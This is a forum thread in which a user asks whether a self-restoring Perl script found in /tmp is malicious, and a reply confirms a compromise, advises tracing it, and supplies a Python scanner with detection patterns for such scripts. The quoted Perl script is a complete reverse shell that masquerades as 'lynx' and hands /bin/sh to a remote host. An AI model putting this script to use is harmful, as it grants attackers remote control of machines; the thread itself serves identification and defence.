SuperBaby

I found this script called "back" in the /tmp folder. I deleted it and it came back again after a day. Is it a malicious script?

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
 

NightStorm

In a word, yes. It's a compromise, though not necessarily a root one. You'll need to track down the source of the file, and patch the problem, as well as go over your server's security with a fine-tooth comb and make sure that nothing else bad gets dropped into /tmp.
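As a starting point for tracking down the source, the sketch below walks a directory and flags files that combine the traits of the script quoted in the question, reporting the owner uid and modification time to compare against web and FTP logs. It is an added example, not part of either post; the function names, the indicator set and the threshold of 3 are assumptions chosen for illustration.

```python
import os
import re
import stat
import sys
import time

# Traits of the "back" script quoted above. Each is weak alone; together they
# describe a script that connects out and hands a shell to the remote end.
INDICATORS = {
    "socket_connect": re.compile(rb"\bconnect\s*\(\s*\w+\s*,"),
    "stdio_on_socket": re.compile(rb"open\s*\(\s*STD(?:IN|OUT|ERR)\s*,\s*[\"']>&"),
    "spawns_shell": re.compile(rb"/bin/(?:ba)?sh\b"),
    "renames_process": re.compile(rb"^\s*\$0\s*=", re.M),
}


def score_file(path, max_bytes=65536):
    """Return the sorted indicator names found in the first max_bytes of path."""
    with open(path, "rb") as fh:
        data = fh.read(max_bytes)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(data))


def scan_dir(root, threshold=3):
    """Return one finding per regular file under root with >= threshold indicators."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):  # skip symlinks, FIFOs, sockets
                    continue
                hits = score_file(path)
            except OSError:  # unreadable, or removed while scanning
                continue
            if len(hits) >= threshold:
                findings.append({"path": path, "uid": st.st_uid,
                                 "mtime": st.st_mtime, "hits": hits})
    return findings


if __name__ == "__main__":
    # Assumption: /tmp is the directory to check, as in the thread.
    for f in scan_dir(sys.argv[1] if len(sys.argv) > 1 else "/tmp"):
        when = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(f["mtime"]))
        # Owner uid and mtime (UTC) are what to line up with web/FTP logs.
        print(f'{f["path"]} uid={f["uid"]} mtime={when}Z hits={",".join(f["hits"])}')
```

A file owned by the web server user or by one hosting account narrows the search to that account's scripts and the requests logged around the reported time; a file that reappears after deletion means the entry point is still open.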